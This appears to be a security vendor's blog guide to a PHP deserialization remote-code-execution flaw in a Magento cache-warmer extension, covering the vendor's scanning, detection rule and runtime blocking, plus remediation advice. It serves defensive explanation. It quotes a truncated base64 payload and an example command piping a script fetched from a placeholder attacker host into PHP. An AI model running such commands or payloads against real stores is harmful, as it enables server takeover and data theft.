How HookProbe Detects CVE-2026-45247 (Mirasvit Mirasvit Full Page Cache Warmer)

In the high-stakes world of E-commerce, performance is everything. For Magento store owners, the Mirasvit Full Page Cache Warmer is a staple extension designed to ensure that customers always land on a fast-loading, pre-rendered page. However, a critical security vulnerability, identified as CVE-2026-45247, has emerged within this extension, turning a performance tool into a potential gateway for unauthenticated attackers. This vulnerability involves the deserialization of untrusted data, leading to Remote Code Execution (RCE).

At HookProbe, our mission is to stay ahead of these threats. In this technical guide, we will break down the mechanics of CVE-2026-45247 and demonstrate how our advanced detection engines—HYDRA, NAPSE, and AEGIS—work in concert to protect your infrastructure. For more information on our advanced security offerings, visit our pricing page.

Understanding CVE-2026-45247: The Deserialization Trap

CVE-2026-45247 is a textbook example of an Insecure Deserialization vulnerability. The flaw resides in how the Mirasvit Full Page Cache Warmer processes the CacheWarmer cookie. When a request is made to a Magento site with this extension enabled, the software attempts to read state information or configuration settings from this cookie.

The core issue is the use of the native PHP unserialize() function on the raw data provided within the cookie. In PHP, unserialize() is a powerful function that converts a stored string representation of an object back into a live PHP object. If the input string is controlled by an attacker, they can inject specially crafted serialized objects that leverage "Property-Oriented Programming" (POP) chains within the application's codebase or its dependencies.

The Impact of RCE via Deserialization

The impact of successful exploitation is catastrophic. Because the CacheWarmer cookie is processed before any authentication checks are performed, an unauthenticated attacker can achieve Remote Code Execution. This allows them to:

  • Steal sensitive customer data (PII) and payment information.
  • Install persistent backdoors or web shells.
  • Modify site content or redirect users to malicious domains.
  • Pivot into the internal network of the hosting environment.

Technical Deep Dive: The Attack Vector

To understand the vulnerability, one must look at the typical PHP object lifecycle. When unserialize() is called, PHP automatically triggers certain "magic methods" such as __wakeup() or __destruct(). If an attacker identifies a class in the Magento environment (or a library like Guzzle or Monolog) that performs a dangerous action in one of these magic methods—such as writing to a file or executing a shell command—they can trigger that action by providing a serialized instance of that class.

In the case of CVE-2026-45247, the CacheWarmer cookie serves as the delivery vehicle. A payload might look like this (base64 encoded):

TzoyNDoiTWlyYXN2aXRcV2FybWVyXEJhZ2dageI...[truncated]...

When decoded and passed to unserialize(), this payload instantiates a chain of objects that eventually leads to the execution of a system command, such as curl http://attacker.com/shell.php | php.

How HookProbe Detects CVE-2026-45247

HookProbe utilizes a multi-layered detection strategy to identify and block CVE-2026-45247. Our architecture is divided into three primary engines: HYDRA, NAPSE, and AEGIS. Each plays a distinct role in the security lifecycle.

1. HYDRA: Proactive Vulnerability Scanning

HYDRA is HookProbe's Dynamic Application Security Testing (DAST) engine. It is designed to probe applications for vulnerabilities from the outside-in, mimicking the behavior of an attacker but in a controlled, safe manner.

To detect CVE-2026-45247, HYDRA performs the following steps:

  • Fingerprinting: HYDRA identifies the presence of the Mirasvit Full Page Cache Warmer extension by analyzing response headers and specific Magento frontend assets.
  • Payload Injection: HYDRA injects non-destructive serialized objects into the CacheWarmer cookie. These objects are designed to trigger a benign callback (like a DNS lookup to a HookProbe listener) if deserialized.
  • Verification: If the HookProbe listener receives a hit from the target server, HYDRA confirms the vulnerability and logs a high-severity alert in the dashboard.

2. NAPSE: Payload and Behavioral Intelligence

NAPSE is our deep inspection engine. It analyzes incoming traffic patterns and the underlying code structure (SAST/IAST) to identify malicious intent that signature-based systems might miss.

For CVE-2026-45247, NAPSE monitors for:

  • Known POP Chains: NAPSE maintains a database of common PHP gadget chains. It inspects the CacheWarmer cookie for serialized strings that match patterns associated with known RCE chains in common Magento libraries.
  • Entropy Analysis: Serialized PHP objects often have a distinct structural entropy. NAPSE flags cookies that contain complex object structures where simple strings or integers are expected.
  • Code Path Analysis: If integrated via our agent, NAPSE monitors the execution of the unserialize() function in the Mirasvit module, flagging any instance where the input source is an untrusted cookie.

3. AEGIS: Runtime Protection and Mitigation

AEGIS is HookProbe's Real-time Protection engine (RASP/WAF). While HYDRA finds the bug and NAPSE understands the threat, AEGIS is the shield that stops the attack in its tracks.

AEGIS provides immediate mitigation for CVE-2026-45247 through:

  • Cookie Sanitization: AEGIS can be configured to intercept the CacheWarmer cookie. If the cookie contains serialized PHP data (identified by the O:, a:, or s: prefixes), AEGIS strips the cookie or blocks the request entirely.
  • Runtime Hooking: AEGIS hooks the unserialize() function at the PHP interpreter level. If the Mirasvit extension attempts to call unserialize() on data originating from a global variable like $_COOKIE, AEGIS throws a security exception, preventing the object from ever being instantiated.

Configuring HookProbe for CVE-2026-45247

To ensure your environment is protected, follow these configuration steps within the HookProbe console. For detailed technical specifications, refer to our documentation.

Step 1: Enable HYDRA Scanning

Navigate to Scans > New Scan. Ensure that the "Magento Extension Suite" is selected in your policy. HYDRA will automatically include the check for CVE-2026-45247 in its next run.

Step 2: Deploy NAPSE Signature Rules

Add the following custom detection rule to your NAPSE profile to flag suspicious cookie data:

rule CVE_2026_45247_Deserialization {
    meta:
        description = "Detects PHP serialized objects in Mirasvit CacheWarmer cookie"
        severity = "CRITICAL"
    condition:
        http.request.cookie("CacheWarmer") matches /^O:[0-9]+:"/ or
        http.request.cookie("CacheWarmer") matches /^a:[0-9]+:{/
}

Step 3: Activate AEGIS Runtime Blocking

In the AEGIS settings, enable "Deserialization Protection." Ensure that the "Block Unsafe Unserialize" toggle is active. This will prevent any untrusted input from reaching the PHP unserialize engine, effectively neutralizing CVE-2026-45247 even if the extension remains unpatched.

Remediation and Best Practices

While HookProbe provides a robust safety net, defense-in-depth requires addressing the root cause. If you are affected by CVE-2026-45247, we recommend the following actions:

  1. Update the Extension: Mirasvit has released a patch for the Full Page Cache Warmer. Ensure you are running the latest version.
  2. Switch to JSON: If you are a developer, replace unserialize() with json_decode() for any data stored in cookies. JSON is a data-interchange format and does not allow for object instantiation, making it inherently safer.
  3. Implement HMAC Signing: If you must use serialization, sign the cookie with a server-side secret using HMAC. Verify the signature before calling unserialize() to ensure the data has not been tampered with.
  4. Principle of Least Privilege: Ensure your web server user (e.g., www-data) has minimal permissions on the filesystem to limit the impact if an RCE occurrs.

Conclusion

CVE-2026-45247 serves as a stark reminder that even performance-enhancing utilities can introduce significant security risks. By leveraging the combined power of HYDRA, NAPSE, and AEGIS, HookProbe users can detect, analyze, and block these sophisticated deserialization attacks before they result in a data breach.

Don't wait for an exploit to happen. Secure your Magento store today. Check out our subscription plans to find the right level of protection for your business.

Frequently Asked Questions (FAQ)

1. Does CVE-2026-45247 require the attacker to have a login?

No. This vulnerability is unauthenticated. An attacker only needs to send a specially crafted HTTP request with the malicious CacheWarmer cookie to target your server.

2. Can a standard Web Application Firewall (WAF) block this?

A standard WAF might block simple payloads, but sophisticated attackers can encode or obfuscate serialized objects to bypass basic regex-based filters. HookProbe's NAPSE engine uses behavioral analysis and deep inspection to identify these bypass attempts, providing much higher reliability than a traditional WAF.

3. How do I know if HookProbe has successfully blocked an exploit attempt?

All blocked attempts are logged in the HookProbe Dashboard under the "Security Events" tab. You will see an alert specifically identifying the AEGIS engine's intervention against a "PHP Deserialization Attempt" targeting the CacheWarmer cookie.